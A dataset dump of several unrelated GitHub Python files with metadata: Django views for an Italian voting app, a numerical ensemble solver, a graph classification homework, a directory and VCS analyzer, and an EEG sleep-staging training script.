\"autore\": autore, \"utenti\": utenti_n, \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n return render(request, \"votation.html\", {'votation': votation, \"autore\": autore, \"utenti\": User.objects.all(), \"partecipazioni\": Partecipazioni.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef DelVote(request, id_v):\n idvv = int(id_v)\n if idvv != 0 and idvv is not None:\n try:\n Votazione.objects.all().filter(id=idvv).delete()\n if Quesito.objects.all().filter(votazione=id_v):\n Quesito.objects.all().filter(votazione=id_v).delete()\n except Votazione.DoesNotExist:\n 
messages.info(request, \"Votazione non cancellata\")\n return render(request, \"removevotations.html\", {\"votations\": Votazione.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef DelVotation(request):\n return render(request, \"removevotations.html\", {\"votations\": (Votazione.objects.all())})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Votantia(request, id_v, id_p):\n autoreid = int(id_p)\n user = get_user_model()\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.exclude(\n reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"addpartecipante.html\", {\"utenti\": utenti_n, \"votation\": votation})\n else:\n return render(request, \"addpartecipante.html\", {\"utenti\": User.objects.all(), \"votation\": votation})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Votantir(request, id_v, id_p):\n autoreid = int(id_p)\n user = get_user_model()\n autore = User.objects.get(pk=autoreid)\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n\n qs = Partecipazioni.objects.all().filter(id_votazione=votation)\n utenti = qs.only('id_partecipante_id')\n if utenti.exists():\n utenti_n = User.objects.filter(id__in=utenti.values_list('id_partecipante', flat=True))\n return render(request, \"RemovePartecipante.html\", {\"utenti\": utenti_n, \"votation\": votation})\n else:\n return render(request, \"RemovePartecipante.html\", {\"utenti\": [], \"votation\": votation})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef AddPartecipazione(request, id_v, id_p, id_a):\n votazione = Votazione.objects.get(pk=id_v)\n partecipante = User.objects.get(pk=id_p)\n autore = User.objects.get(pk=id_a)\n partecipazione = Partecipazioni(id_votazione=votazione, id_partecipante=partecipante)\n if Partecipazioni.objects.all().filter(id_votazione=votazione).count() < votazione.maxvotanti:\n try:\n partecipazione.save()\n messages.info(request, f\"Partecipante {partecipazione.id_partecipante} aggiunto!\")\n except Exception as e:\n messages.error(request, \"Abbiamo riscontrato un errore salvando la partecipazione\")\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n\n\n if utenti.exists():\n utenti_n = User.objects.exclude(reduce(operator.or_, (Q(id__contains=x) for x in utenti.values_list('id_partecipante', flat=True))))\n return render(request, \"AddPartecipante.html\", {'votation': votazione, \"autore\": autore.id, \"utenti\": utenti_n, \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n return render(request, \"AddPartecipante.html\", {'votation': votazione, \"autore\": autore.id, \"utenti\": User.objects.all(), \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n messages.error(request, \"Numero massimo di votanti è stato raggiunto, impossibile aggiungerne altri!\")\n return render(request, \"AddPartecipante.html\",\n {'votation': votazione, \"autore\": autore.id, \"utenti\": [],\n \"partecipazioni\": 
Partecipazioni.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef makeQuesito(request, id_v):\n form = AddQuesitoForm()\n votation = None\n if request.method == 'POST':\n try:\n votation = Votazione.objects.get(pk=id_v)\n except Votazione.DoesNotExist:\n votation = None\n form = AddQuesitoForm(request.POST)\n if form.is_valid():\n instance = form.instance\n instance.votazione = id_v\n instance.save()\n messages.success(request, \"Quesito creato correttamente!\")\n return render(request, \"makequesito.html\", {'votation': votation, 'form': form})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef removeQuesiti(request, id_v):\n if (id_v != 0 and id_v is not None):\n idvv = int(id_v)\n try:\n quesiti = Quesito.objects.all().filter(votazione=idvv)\n except Votazione.DoesNotExist:\n messages.info(request, \"Votazione non cancellata\")\n\n return render(request, \"removequesito.html\", {\"quesiti\": quesiti})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef removeQuesito(request, id_q):\n idq = int(id_q)\n try:\n Quesito.objects.get(pk=idq).delete()\n messages.info(request, \"Quesito cancellato\")\n except Votazione.DoesNotExist:\n messages.info(request, \"Quesito non cancellato\")\n\n return render(request, \"removequesito.html\", {\"quesiti\": Quesito.objects.all()})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Voteall(request):\n partecipazioni_sue = Partecipazioni.objects.all().filter(id_partecipante=request.user.id).filter(votato=0)\n partecipazioni_dis = partecipazioni_sue.only('id_votazione_id')\n votation_vote = Votazione.objects.all().filter(id__in=partecipazioni_dis.values_list('id_votazione', flat=True))\n votazionf = []\n for votazione in votation_vote:\n if votazione.datafine > date.today():\n votazionf.append(votazione)\n return render(request, \"voteall.html\", {\"votations\": votazionf})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Vote(request, id_v):\n quesiti = Quesito.objects.all().filter(votazione=id_v)\n return render(request, \"vote.html\", {\"quesiti\": quesiti})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef saveVot(request, risp, id_v):\n i = 0\n risps = ast.literal_eval(risp)\n if isinstance(risps, int):\n quesiti = Quesito.objects.get(votazione=id_v)\n else:\n quesiti = Quesito.objects.all().filter(votazione=id_v)\n risps = [n for n in risps]\n\n p = Partecipazioni.objects.get(id_partecipante_id=request.user.id, id_votazione=int(id_v))\n p.votato = 1\n p.save()\n v = Votazione.objects.get(pk=int(id_v))\n v.n_votanti = v.n_votanti+1\n v.save()\n if isinstance(risps, int):\n if risps == 1: quesiti.n_fav += 1\n if risps == 2: quesiti.n_ast += 1\n if risps == 3: quesiti.n_nfav += 1\n quesiti.save()\n else:\n for q in quesiti:\n if risps[i] == 1: q.n_fav += 1\n if risps[i] == 2: q.n_ast += 1\n if risps[i] == 3: q.n_nfav += 1\n i += 1\n q.save()\n\n messages.success(request, \"Votazione salvata!\")\n return render(request, \"home.html\", {\"votations\": (Votazione.objects.all())})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef RemovePartecipazione(request, id_v, id_p, id_a):\n votazione = 
Votazione.objects.get(pk=id_v)\n partecipante = User.objects.get(pk=id_p)\n partecipazione = Partecipazioni(id_votazione=votazione, id_partecipante=partecipante)\n autore = User.objects.get(pk=id_a)\n nome = partecipazione.id_partecipante\n ha_votato_query = Partecipazioni.objects.all().filter(id_partecipante_id=id_p).filter(id_votazione_id=id_v)\n if ha_votato_query.filter(votato=0):\n Partecipazioni.objects.all().filter(id_partecipante_id=id_p).filter(id_votazione_id=id_v).delete()\n messages.info(request, f\"Partecipante {nome} rimosso!\")\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n utenti_n = User.objects.all().filter(id__in=utenti.values_list('id_partecipante', flat=True))\n return render(request, \"removepartecipante.html\", {'votation': votazione, \"autore\": autore.id,\n \"utenti\": utenti_n,\n \"partecipazioni\": Partecipazioni.objects.all()})\n else:\n qs = Partecipazioni.objects.all().filter(id_votazione=votazione)\n utenti = qs.only('id_partecipante_id')\n utenti_n = User.objects.all().filter(id__in=utenti.values_list('id_partecipante', flat=True))\n messages.error(request, f\"Partecipante {nome} non può essere rimosso perchè ha già votato!\")\n return render(request, \"removepartecipante.html\", {'votation': votazione,\n \"autore\": autore.id, \"utenti\": utenti_n,\n \"partecipazioni\": Partecipazioni.objects.all()})\n\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Risultati(request):\n partecipazioni_sue = Partecipazioni.objects.all().filter(id_partecipante=request.user.id)\n partecipazioni_dis = partecipazioni_sue.only('id_votazione_id')\n votazioniv = Votazione.objects.all().filter(id__in=partecipazioni_dis.values_list('id_votazione', flat=True))\n votazionic = Votazione.objects.all().filter(autore_id=request.user.id)\n votazioni = votazionic.union(votazioniv)\n votazionf = []\n for votazione in votazioni:\n if votazione.datafine < date.today():\n votazionf.append(votazione)\n return render(request, \"Risultati.html\", {\"votations\": votazionf})\n\n\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@login_required(login_url=\"login\")\ndef Esito(request, id_v):\n user = get_user_model()\n votazione = Votazione.objects.get(pk=int(id_v))\n autore = User.objects.get(pk=votazione.autore.id)\n quesiti = Quesito.objects.all().filter(votazione=int(id_v))\n valida = votazione.n_votanti >= votazione.minvotanti\n perc_fav=[]\n perc_ast=[]\n perc_nfav=[]\n n_partecipanti= Partecipazioni.objects.filter(id_votazione=id_v).count()\n\n if n_partecipanti != 0:\n perc_votato = ((votazione.n_votanti/n_partecipanti)*100)\n else:\n perc_votato = 0\n\n for quesito in quesiti:\n if votazione.n_votanti != 0:\n perc_fav.append((quesito.n_fav / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n perc_ast.append((quesito.n_ast / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n perc_nfav.append((quesito.n_nfav / (quesito.n_nfav + quesito.n_fav + quesito.n_ast))*100)\n else:\n perc_fav.append(0)\n perc_ast.append(0)\n perc_nfav.append(0)\n perc_list= zip(perc_fav ,perc_ast ,perc_nfav, quesiti)\n return render(request, \"Esito.html\", {\"votation\": votazione, \"autore\": autore, \"valida\": valida, \"listperc\": perc_list , \"percvotato\": 
perc_votato})\n\n\n","repo_name":"dotPinto/Voteau","sub_path":"voteau/voteau/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14984,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
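A hedged sketch of how a few of the views above might be wired into a urls.py; the "home" and "login" route names are taken from the redirect() calls in the views, while the paths themselves and the remaining names are assumptions:

from django.urls import path
from voteau import views

urlpatterns = [
    path('', views.blank),
    path('home/', views.home, name='home'),
    path('login/', views.Login, name='login'),
    path('logout/', views.Logout, name='logout'),
    path('votation/<int:autoreId>/<int:votationId>/', views.votations),
]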
+{"seq_id":"6798180748","text":"import os\nimport numpy as np\nimport numpy.random as r\nimport scipy.linalg as la\nimport multiprocessing as mp\nimport collections\nimport lib_misc\n\ndata_root = \"{}/solver_md\".format(lib_misc.data_root)\ndefault_settings = {\n 'parallel': True,\n 'adaptive': True,\n 'dt_min': 1e-5,\n 'dt_max': 1e3,\n 'dirname': 'test',\n }\n\nMdIterationData = collections.namedtuple(\n 'MdIterationData', [\n 'solver', 'theta', 'xis', 'delta', 'sigma', 'dt',\n 'new_theta', 'new_xis', 'value_func'])\n\n\n\nclass MdSolver:\n\n def __init__(self, **opts):\n self.J = opts['J']\n self.delta = opts['delta']\n self.sigma = opts['sigma']\n self.dt = opts['dt']\n self.noise = opts['noise']\n self.reg = opts['reg']\n dirname = opts.get('dirname', default_settings['dirname'])\n self.data_dir = \"{}/{}\".format(data_root, dirname)\n os.makedirs(self.data_dir, exist_ok=True)\n self.parallel = opts.get('parallel', default_settings['parallel'])\n self.adaptive = opts.get('adaptive', default_settings['adaptive'])\n self.precond_vec = opts.get('precond_vec', None)\n self.precond_mat = opts.get('precond_mat', None)\n if self.precond_mat is not None:\n self.inv_precond_mat = la.inv(self.precond_mat)\n self.sqrt_precond_mat = la.sqrtm(self.precond_mat)\n if self.adaptive:\n self.dt_min = opts.get('dt_min', default_settings['dt_min'])\n self.dt_max = opts.get('dt_max', default_settings['dt_max'])\n\n def precond_map(self, u):\n if self.precond_vec is None:\n return u\n return self.inv_precond_mat.dot(u - self.precond_vec)\n\n def precond_unmap(self, u):\n if self.precond_vec is None:\n return u\n return self.precond_vec + self.precond_mat.dot(u)\n\n def g_ensembles(self, ip, ensembles):\n # Strange but seemingly necessary to avoid pickling issue? \\_(\")_/\n global forward\n\n def forward(u):\n return ip.forward(self.precond_unmap(u))\n # -------------------------------- #\n if self.parallel:\n pool = mp.Pool(4)\n g_ensembles = pool.map(forward, ensembles)\n pool.close()\n else:\n g_ensembles = np.array([forward(u) for u in ensembles])\n return g_ensembles\n\n def step(self, ip, theta, xis, filename=None):\n\n # Preconditioning\n unmapped_theta = theta\n theta = self.precond_map(theta)\n\n J, dim_u = self.J, ip.d\n g_theta = ip.forward(unmapped_theta)\n\n func = ip.reg_least_squares if self.reg else ip.least_squares\n value_func = func(unmapped_theta)\n\n # Calculation of the LHS in the inner product\n ensembles = np.tile(theta, (J, 1)) + self.sigma*xis\n g_thetas = self.g_ensembles(ip, ensembles)\n grads_approx = (1/self.sigma)*np.array([g - g_theta for g in g_thetas])\n\n if self.noise or self.reg:\n Cxi = (1/J) * xis.T.dot(xis)\n if self.noise:\n sqrt2Cxi = la.sqrtm(2*Cxi)\n if J <= dim_u:\n sqrt2Cxi = np.real(sqrt2Cxi)\n dW = r.randn(dim_u)\n\n drift = 0\n if self.reg:\n inv_Σ = ip.inv_Σ\n prior_μ = np.zeros(len(theta))\n if self.precond_mat is not None:\n prior_μ = prior_μ - self.precond_vec\n inv_Σ = self.sqrt_precond_mat.dot(inv_Σ).dot(self.sqrt_precond_mat)\n drift = - Cxi.dot(inv_Σ).dot(theta - prior_μ)\n\n inner_product = ip.inv_Γ.dot(g_theta - ip.y)\n for grad_approx, xi in zip(grads_approx, xis):\n coeff = grad_approx.dot(inner_product)\n drift -= (1/J) * coeff * xi\n\n my_dt = self.dt\n if self.adaptive:\n dt_0, dt_min, dt_max = self.dt, self.dt_min, self.dt_max\n my_dt = dt_0/(dt_0/dt_max + la.norm(drift, 2))\n my_dt = max(my_dt, dt_min)\n print(\"New time step: {}\".format(my_dt))\n\n new_theta = theta + drift*my_dt + \\\n (np.sqrt(my_dt)*sqrt2Cxi.dot(dW) if self.noise else 
0)\n alpha = np.exp(-my_dt/self.delta**2)\n new_xis = alpha * xis + np.sqrt(1-alpha**2) * r.randn(J, dim_u)\n\n # Undo preconditioning\n unmapped_new_theta = self.precond_unmap(new_theta)\n\n data = MdIterationData(\n solver='md', theta=unmapped_theta, xis=xis, delta=self.delta,\n sigma=self.sigma, dt=my_dt, new_theta=unmapped_new_theta,\n new_xis=new_xis, value_func=value_func,)\n\n if filename is not None:\n np.save(\"{}/{}\".format(self.data_dir, filename),\n data._asdict())\n\n return data\n\n\nclass MdSimulation:\n\n def __init__(self, ip, initial, solver, save_step=50):\n self.ip = ip\n self.theta = initial\n self.solver = solver\n self.save_step = save_step\n\n self.xis = np.random.randn(solver.J, ip.d)\n self.all_thetas = []\n self.all_fthetas = []\n self.iteration = 0\n\n def step(self):\n data = self.solver.step(self.ip, self.theta, self.xis,\n filename=\"iteration-{:04d}.npy\".format(self.iteration))\n self.iteration += 1\n self.all_thetas.append(data.theta)\n self.all_fthetas.append(data.value_func)\n print(\"Step: {}\".format(np.linalg.norm(self.theta - data.new_theta)))\n self.theta = data.new_theta\n self.xis = data.new_xis\n\n plot_step = 50\n if self.iteration % self.save_step == 0:\n filename=\"simulation-iteration-{:04d}.npy\".format(self.iteration)\n np.save(\"{}/{}\".format(self.solver.data_dir, filename),\n self.get_data())\n\n return data\n\n def get_data(self):\n all_thetas = np.asarray(self.all_thetas).reshape(self.iteration, self.ip.d)\n all_fthetas = np.asarray(self.all_fthetas)\n return {'solver': 'md', 'ensembles': all_thetas, 'f_ensembles': all_fthetas}\n","repo_name":"urbainvaes/bayesicle","sub_path":"solver_md.py","file_name":"solver_md.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
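A hedged construction sketch for the solver above, using only the option keys that MdSolver.__init__ actually reads; the values are illustrative:

solver = MdSolver(J=8, delta=1.0, sigma=0.01, dt=0.1,
                  noise=False, reg=True, dirname='demo')
# MdSimulation would then drive it, given an inverse problem `ip` exposing
# .d, .forward(), .inv_Γ, .y (and .inv_Σ when reg=True), as step() assumes:
# sim = MdSimulation(ip, initial=np.zeros(ip.d), solver=solver)
# data = sim.step()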
+{"seq_id":"21453822608","text":"def probabilistic_classifier(scores, adjacency_list, ground_truth_node):\n '''\n return average, because weight is 1, thus omitted weight\n :param scores:\n :param adjacency_list:\n :return:\n '''\n for node in range(1, 11):\n if node in ground_truth_node:\n continue\n neibs = adjacency_list[node]\n if len(neibs) == 0:\n continue\n avg = 0\n for neib in neibs:\n avg += scores[neib]\n avg = avg/len(neibs)\n scores[node] = avg\n return scores\n\ndef relational_classification():\n adjacency_list = {\n 1: {2, 3},\n 2: {1, 3, 4},\n 3: {1, 2, 6},\n 4: {2, 7, 8},\n 5: {6, 8, 9},\n 6: {3, 5, 9, 10},\n 7: {4, 8},\n 8: {4, 5, 7, 9},\n 9: {5, 6, 8, 10},\n 10: {6, 9}\n }\n scores = {i: 0.5 for i in range(1,11)}\n\n # initialize ground truth\n scores[3] = 1\n scores[5] = 1\n scores[8] = 0\n scores[10] = 0\n\n # ground truth nodes\n ground_truth_node = {3, 5, 8, 10}\n\n # after second iteration\n iter_n = 2\n for i in range(iter_n):\n scores = probabilistic_classifier(scores, adjacency_list, ground_truth_node)\n print('scores after second iteration:\\n', scores)\n\n # if threshold is 0,5, the negative nodes:\n threshold = 0.5\n neg_nodes = [node for node, value in scores.items() if value < threshold]\n print('negative nodes are:\\n', neg_nodes)\n\n# q1.1\nrelational_classification()\n\ndef belief_propagation():\n '''\n to be done\n :return:\n '''\n pass","repo_name":"WentaoX/home_work_for_Machine_Learning_with_Graphs_2019","sub_path":"hw2-bundle/hw2-q1.py","file_name":"hw2-q1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17129002007","text":"import os\nfrom pypro.exceptions import PathNotExists\nfrom pypro.initializers import possibles_vcs\nfrom pypro.utils import my_chdir\nfrom subprocess import call, STDOUT\nfrom shutil import copy, which\n\n\nclass StructureAnalizer:\n \"\"\"Class docstring\n \"\"\"\n\n def __init__(self, custom_prefixes=None):\n self.structure = \"\"\n if custom_prefixes:\n self.exclude_prefixes = custom_prefixes.split(',')\n else:\n self.exclude_prefixes = []\n\n def analize_dir_structure(self, path):\n self.structure = \"\"\n if not os.path.isdir(path):\n raise PathNotExists(\"Dir does not exists\")\n if path.endswith('/'):\n path = path[:-1]\n basename_index = path.find(os.path.basename(path))\n for dirpath, dirnames, filenames in os.walk(path):\n filenames = [filename\n for filename in filenames\n if not self._check_prefixes(filename)]\n dirnames[:] = [dirname\n for dirname in dirnames\n if not self._check_prefixes(dirname)]\n\n self.structure += dirpath[basename_index:] + '/\\n'\n for filename in filenames:\n if filename != '':\n self.structure += os.path.join(dirpath[basename_index:],\n filename) + '\\n'\n\n def _check_prefixes(self, to_check):\n if to_check == '__init__.py':\n return False\n return to_check.startswith(tuple(self.exclude_prefixes))\n\n def restructure(self, replace=False):\n basename = self.structure.split('\\n')[0][:-1]\n dirname = 'project_name'\n if replace:\n return dirname + self.structure.replace(basename, '+')[1:].rstrip()\n return self.structure.replace(basename, dirname).rstrip()\n\n def restructure_as_tree(self):\n template = ''\n for name in self.restructure().split('\\n'):\n level = name.count('/')\n if name.endswith('/'):\n name = name[:-1]\n level -= 1\n indent = \" \" * 4 * level\n basename = name[(name.rfind('/') + 1):]\n template += '{}{}\\n'.format(indent, basename)\n return template\n\n\ndef analize_vcs(path, path_for_copy_files):\n \"\"\"Docstring for analize_vcs.\n \"\"\"\n vcs = tuple(filter(lambda x: len(x) < 4, possibles_vcs))\n command_vcs = dict(zip(vcs, ('status', 'status', 'root', 'info')))\n if not (os.path.isdir(path) and os.path.isdir(path_for_copy_files)):\n raise PathNotExists\n\n def handle_ignore_file(vcs, dest, svn_flag=False):\n ignore_file_name = '.' + vcs + 'ignore'\n if svn_flag:\n pass # svn ignore files stuff here\n else:\n try:\n return copy(ignore_file_name, dest), ignore_file_name\n except FileNotFoundError:\n return None, None\n\n with my_chdir(path):\n for k, v in command_vcs.items():\n svn_flag = True if k == 'svn' else False\n if which(k) and call([k, v], stderr=STDOUT,\n stdout=open(os.devnull, 'w')) == 0:\n file_dest, ignore_file_name = handle_ignore_file(\n k, path_for_copy_files, svn_flag)\n return k, file_dest, ignore_file_name\n return None, None, None\n","repo_name":"Myrmidon-experiments/pypro","sub_path":"pypro/analizers.py","file_name":"analizers.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"70929373671","text":"\"\"\"Training of neural network.\n\"\"\"\n\nimport os\nimport argparse\n\nimport mne\nimport torch\nfrom torch import nn\nfrom braindecode import EEGClassifier\nfrom braindecode.models import SleepStagerChambon2018\nfrom braindecode.util import set_random_seeds\nfrom skorch.helper import predefined_split\nfrom skorch.callbacks import (\n Checkpoint, EarlyStopping, EpochScoring, LRScheduler)\nfrom sklearn.metrics import (\n confusion_matrix, classification_report, balanced_accuracy_score)\nfrom sklearn.utils.class_weight import compute_class_weight\nimport pickle\n\nfrom transforms import Compose, AdditiveWhiteNoise, logm_cov\nfrom models import DynamicSpatialFilter\nfrom utils import (\n load_data, apply_autoreject, split_dataset, none_or_int, get_exp_name,\n seed_np_rng)\n\n\nmne.set_log_level('WARNING')\ntorch.multiprocessing.set_sharing_strategy('file_system')\n\n\ndef main(args):\n\n #%% 1- General stuff\n cuda = torch.cuda.is_available() # check if GPU is available\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n if cuda:\n torch.backends.cudnn.enabled = True\n torch.backends.cudnn.benchmark = not args.deterministic\n torch.backends.cudnn.deterministic = args.deterministic\n else:\n pass # torch.set_num_threads(args.n_jobs)\n\n # Create savedir\n dir_name = get_exp_name(args.dataset, args.model, args.dsf_type,\n args.denoising)\n save_path = os.path.join(args.save_dir, dir_name)\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n #%% 2- Load, preprocess and window data\n windows_dataset = load_data(args.dataset, args.window_size_s, args.n_jobs)\n\n if args.denoising == 'autoreject':\n windows_dataset = apply_autoreject(\n windows_dataset, args.seed, args.n_jobs)\n\n # Split into train, valid and test sets\n available_classes = windows_dataset.get_metadata()['target'].unique()\n train_set, valid_set, test_set = split_dataset(\n windows_dataset, args.valid_size, args.test_size,\n random_state_valid=args.random_state_valid,\n random_state_test=args.random_state_test)\n del windows_dataset\n\n if args.denoising == 'data_augm':\n train_set.transform = AdditiveWhiteNoise(\n p=0.5, noise_strength=(0.5, 1), noise_std=(20, 50),\n recording_wise=False)\n\n # Extract weights to balance the loss function\n y_true_train = train_set.get_metadata()['target'].to_numpy()\n train_weights = torch.Tensor(compute_class_weight(\n 'balanced', classes=available_classes, y=y_true_train)).to(device)\n\n #%% 3- Create model\n\n # Set random seed to be able to reproduce results\n set_random_seeds(seed=args.seed, cuda=cuda)\n\n # Extract number of channels and time steps from dataset\n n_classes = len(available_classes)\n n_channels = train_set[0][0].shape[0]\n if args.dsf_type != 'vanilla':\n if args.dsf_type == 'dsfd':\n mlp_input = 'log_diag_cov'\n dsf_soft_thresh = False\n elif args.dsf_type == 'dsfm_st':\n mlp_input = 'logm_cov_eig'\n dsf_soft_thresh = True\n\n # Use CPU to compute logm, it's faster than pytorch with cuda\n train_set.transform = logm_cov if train_set.transform[0] is None \\\n else Compose([train_set.transform[0], logm_cov])\n valid_set.transform = logm_cov\n test_set.transform = logm_cov\n\n else:\n raise ValueError(\n f'dsf_type must be None, dsfd or dsfm_st, got {args.dsf_type}')\n dsf = DynamicSpatialFilter(\n n_channels, mlp_input=mlp_input,\n n_out_channels=args.dsf_n_out_channels,\n apply_soft_thresh=dsf_soft_thresh)\n n_channels = dsf.n_out_channels\n\n input_size_samples = len(train_set.datasets[0].windows.times)\n\n sfreq = 
train_set.datasets[0].windows.info['sfreq']\n if args.model == 'stager_net':\n model = SleepStagerChambon2018(\n n_channels, sfreq, n_conv_chs=args.n_conv_chs,\n input_size_s=input_size_samples / sfreq, pad_size_s=0.1,\n n_classes=n_classes, dropout=args.dropout, apply_batch_norm=True\n ).to(device)\n else:\n raise NotImplementedError\n\n if args.dsf_type != 'vanilla':\n model = nn.Sequential(dsf, model)\n n_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'\\nModel has {n_params} trainable parameters.\\n')\n\n if torch.cuda.device_count() > 1: # Parallelize model over GPUs\n print(f'\\nUsing {torch.cuda.device_count()} GPUs.\\n')\n model = nn.DataParallel(model)\n\n #%% 4- Train and evaluate model\n\n cp = Checkpoint(dirname=save_path)\n early_stopping = EarlyStopping(patience=args.patience)\n train_bal_acc = EpochScoring(\n scoring='balanced_accuracy', on_train=True, name='train_bal_acc',\n lower_is_better=False)\n valid_bal_acc = EpochScoring(\n scoring='balanced_accuracy', on_train=False, name='valid_bal_acc',\n lower_is_better=False)\n\n callbacks = [\n ('cp', cp),\n ('patience', early_stopping),\n ('train_bal_acc', train_bal_acc),\n ('valid_bal_acc', valid_bal_acc),\n ]\n\n if args.cosine_annealing:\n callbacks.append(('lr_scheduler', LRScheduler(\n 'CosineAnnealingLR', T_max=args.n_epochs - 1)))\n\n net = EEGClassifier(\n module=model,\n criterion=torch.nn.CrossEntropyLoss,\n criterion__weight=train_weights,\n optimizer=torch.optim.AdamW,\n optimizer__weight_decay=args.weight_decay,\n train_split=predefined_split(valid_set),\n optimizer__lr=args.lr,\n max_epochs=args.n_epochs,\n batch_size=args.batch_size,\n iterator_train__shuffle=True,\n iterator_train__num_workers=args.num_workers,\n iterator_valid__num_workers=args.num_workers,\n iterator_train__worker_init_fn=seed_np_rng,\n callbacks=callbacks,\n device=device\n )\n net.fit(train_set, y=None)\n\n # Load best model\n net.initialize()\n net.load_params(checkpoint=cp)\n\n # Pickle best model\n with open(os.path.join(save_path, 'best_model.pkl'), 'wb') as f:\n net.train_split = None # Avoid pickling the validation set\n pickle.dump(net, f)\n\n #%% 5- Evaluate performance\n\n y_true_test = test_set.get_metadata()['target'].to_numpy()\n y_pred_test = net.predict(test_set)\n test_bal_acc = balanced_accuracy_score(y_true_test, y_pred_test) * 100\n\n print('\\nTest results:\\n-------------\\n')\n print(f'Balanced accuracy: {test_bal_acc:0.2f}%\\n')\n print('Confusion matrix:')\n print(confusion_matrix(y_true_test, y_pred_test))\n print('\\nClassification report:')\n print(classification_report(y_true_test, y_pred_test))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train models')\n\n # Plumbing\n parser.add_argument('--save_dir', type=str, default='./runs',\n help='save results in this directory (default: ./runs) ')\n parser.add_argument('--seed', type=int, default=87,\n help='random seed (default: 87)')\n parser.add_argument('--n_jobs', type=int, default=1,\n help='number of parallel processes to use (default: 1)')\n parser.add_argument('--deterministic', type=bool, default=True,\n help='make training deterministic (default: True)')\n parser.add_argument('--num_workers', type=int, default=0,\n help='number of torch workers for data loading (default: 0')\n\n # Dataset\n parser.add_argument('--dataset', type=str, default='pc18_debug',\n choices=['sleep_physionet', 'pc18', 'pc18_debug'],\n help='sleep_physionet|pc18|pc18_debug')\n parser.add_argument('--valid_size', 
type=float, default=0.2,\n help='proportion of dataset to keep for validation (default: 0.2)')\n parser.add_argument('--test_size', type=float, default=0.2,\n help='proportion of dataset to keep for testing (default: 0.2)')\n parser.add_argument('--random_state_valid', type=int, default=87,\n help='random state for splitting valid set (default: 87)')\n parser.add_argument('--random_state_test', type=int, default=87,\n help='random state for splitting test set (default: 87)')\n\n # Preprocessing\n parser.add_argument('--window_size_s', type=int, default=30,\n help='size of input windows in seconds (default: 30)')\n\n # Model hyperparameters\n parser.add_argument('--model', type=str, default='stager_net',\n choices=['stager_net'],\n help='model name (default: stager_net)')\n parser.add_argument('--dropout', type=float, default=0.5,\n help='dropout for fully connected layer (default: 0.5)')\n parser.add_argument('--n_conv_chs', type=int, default=16,\n help='number of convolutional channels (default: 16)')\n parser.add_argument('--dsf_type', type=str, default='vanilla',\n choices=['vanilla', 'dsfd', 'dsfm_st'],\n help='Type of DSF module (default: None)')\n parser.add_argument('--dsf_n_out_channels', type=none_or_int, default=None,\n help='number of DSF virtual channels (default: None)')\n parser.add_argument('--denoising', type=str, default='no_denoising',\n choices=['no_denoising', 'autoreject', 'data_augm'],\n help='no_denoising|autoreject|data_augm')\n\n # Training hyperparameters\n parser.add_argument('--lr', type=float, default=1e-3,\n help='learning rate (default: 1e-3)')\n parser.add_argument('--batch_size', type=int, default=64,\n help='batch size (default: 64)')\n parser.add_argument('--n_epochs', type=int, default=5,\n help='number of training epochs (default: 5)')\n parser.add_argument('--patience', type=int, default=5,\n help='patience for training epochs (default: 5)')\n parser.add_argument('--weight_decay', type=float, default=0.001,\n help='weight decay (default: 0.001)')\n parser.add_argument('--cosine_annealing', type=bool, default=True,\n help='whether to use cosine annealing (default: True)')\n\n args = parser.parse_args()\n 